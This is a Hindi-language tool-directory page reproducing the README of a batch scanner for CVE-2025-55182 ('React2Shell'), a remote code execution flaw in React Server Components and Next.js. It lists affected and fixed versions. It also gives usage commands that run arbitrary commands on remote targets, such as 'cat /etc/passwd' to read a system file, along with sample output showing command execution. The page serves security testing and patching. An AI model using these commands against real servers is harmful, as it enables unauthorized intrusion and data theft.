Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/qixinlee/cve-2025-55182-scanner
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

स्वचालित स्कैनर CVE-2025-55182 के लिए: React Server Components और Next.js में एक गंभीर RCE भेद्यता।

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
CVE-2025-55182-Scanner — स्वचालित स्कैनर CVE-2025-55182 के लिए: React Server Components और Next.js में एक गंभीर RCE भेद्यता। | Kitploit

CVE-2025-55182 RCE Scanner

CVE-2025-55182 (React2Shell) दूरस्थ कोड निष्पादन भेद्यता के लिए बैच डिटेक्शन और सत्यापन उपकरण।

⚠️ CVSS 10.0 गंभीर भेद्यता | React Server Components और Next.js 15.x/16.x संस्करणों को प्रभावित करता है | केवल अधिकृत सुरक्षा परीक्षण के लिए

भेद्यता परिचय

CVE-2025-55182 (उर्फ "React2Shell") एक CVSS 10.0 पूर्ण अंक गंभीरता वाली अप्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता है।

यह भेद्यता React Server Components (RSC) के react-server पैकेज में RSC "Flight" प्रोटोकॉल को संसाधित करते समय असुरक्षित डिसेरियलाइज़ेशन समस्या के कारण उत्पन्न होती है। हमलावर विशेष रूप से तैयार HTTP अनुरोध भेजकर भेद्यता वाले सर्वर पर मनमाना कोड निष्पादित कर सकते हैं।

चूंकि Next.js RSC "Flight" प्रोटोकॉल का उपयोग करता है, इसलिए create-next-app के साथ बनाए गए डिफ़ॉल्ट कॉन्फ़िगरेशन एप्लिकेशन भी डेवलपर द्वारा कोई अतिरिक्त कोड लिखे बिना शोषित किए जा सकते हैं। 5 दिसंबर 2025 से इस भेद्यता का सक्रिय रूप से शोषण होने का पता चला है।

प्रभावित संस्करण

React Server Components प्रभावित संस्करण:

पैकेज नामप्रभावित संस्करण
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js प्रभावित संस्करण (App Router का उपयोग करते हुए):

अन्य संभावित रूप से प्रभावित RSC फ्रेमवर्क/उपकरण:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (RSC मोड)

अस्थायी शमन उपाय

⚠️ महत्वपूर्ण नोट: इस भेद्यता का कोई ज्ञात अस्थायी शमन उपाय नहीं है, सुरक्षित संस्करण में अपग्रेड करना ही एकमात्र फिक्स है।

अनुशंसित अपग्रेड संस्करण:

  • React: 19.0.1, 19.1.2 या 19.2.1 में अपग्रेड करें
  • Next.js: 16.0.7, 15.5.7, 15.4.8 या 15.3.6 में अपग्रेड करें

आधिकारिक रूप से प्रदान किए गए fix-react2shell-next npm पैकेज का उपयोग प्रभावित Next.js एप्लिकेशन को अपडेट करने में सहायता के लिए किया जा सकता है।

निर्भरताएँ स्थापित करें

root@kitploit:~
pip install requests

उपयोग विधि

मूल उपयोग

root@kitploit:~
# बैच स्कैन (urls.txt से लक्ष्य पढ़ें)
python CVE-2025-55182.py -f urls.txt

# एकल लक्ष्य परीक्षण
python CVE-2025-55182.py -u http://192.168.1.100:3000

कस्टम कमांड

root@kitploit:~
# whoami कमांड निष्पादित करें
python CVE-2025-55182.py -f urls.txt -c "whoami"

# hostname कमांड निष्पादित करें
python CVE-2025-55182.py -u http://target.com -c "hostname"

# फ़ाइल पढ़ें
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

उन्नत विकल्प

root@kitploit:~
# थ्रेड्स और टाइमआउट निर्दिष्ट करें
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# कस्टम आउटपुट फ़ाइल
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# साइलेंट मोड (केवल भेद्यता URL आउटपुट करें)
python CVE-2025-55182.py -f urls.txt -q

पैरामीटर स्पष्टीकरण

URL फ़ाइल प्रारूप

प्रति पंक्ति एक URL, उदाहरण:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

आउटपुट उदाहरण

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

आउटपुट फ़ाइल

स्कैन परिणाम CSV प्रारूप में सहेजे जाते हैं, जिनमें निम्नलिखित फ़ील्ड होते हैं:

  • url - लक्ष्य URL
  • status - HTTP स्थिति कोड
  • vulnerable - क्या भेद्यता मौजूद है
  • output - कमांड निष्पादन आउटपुट
  • error - त्रुटि संदेश

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, कृपया इसका उपयोग अवैध उद्देश्यों के लिए न करें। उपयोगकर्ता को संबंधित जिम्मेदारी स्वयं वहन करनी होगी।

टूल डाउनलोड करें
मुख्य संस्करणप्रभावित संस्करण सीमाफिक्स संस्करण
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
पैरामीटरस्पष्टीकरणडिफ़ॉल्ट मान
-f, --fileURL सूची फ़ाइलurls.txt
-u, --urlएकल लक्ष्य URL-
-t, --threadsसमवर्ती थ्रेड्स की संख्या20
--timeoutअनुरोध टाइमआउट (सेकंड)10
-o, --outputआउटपुट CSV फ़ाइलresults.csv
-c, --commandनिष्पादित किया जाने वाला कमांडid
-q, --quietसाइलेंट मोडfalse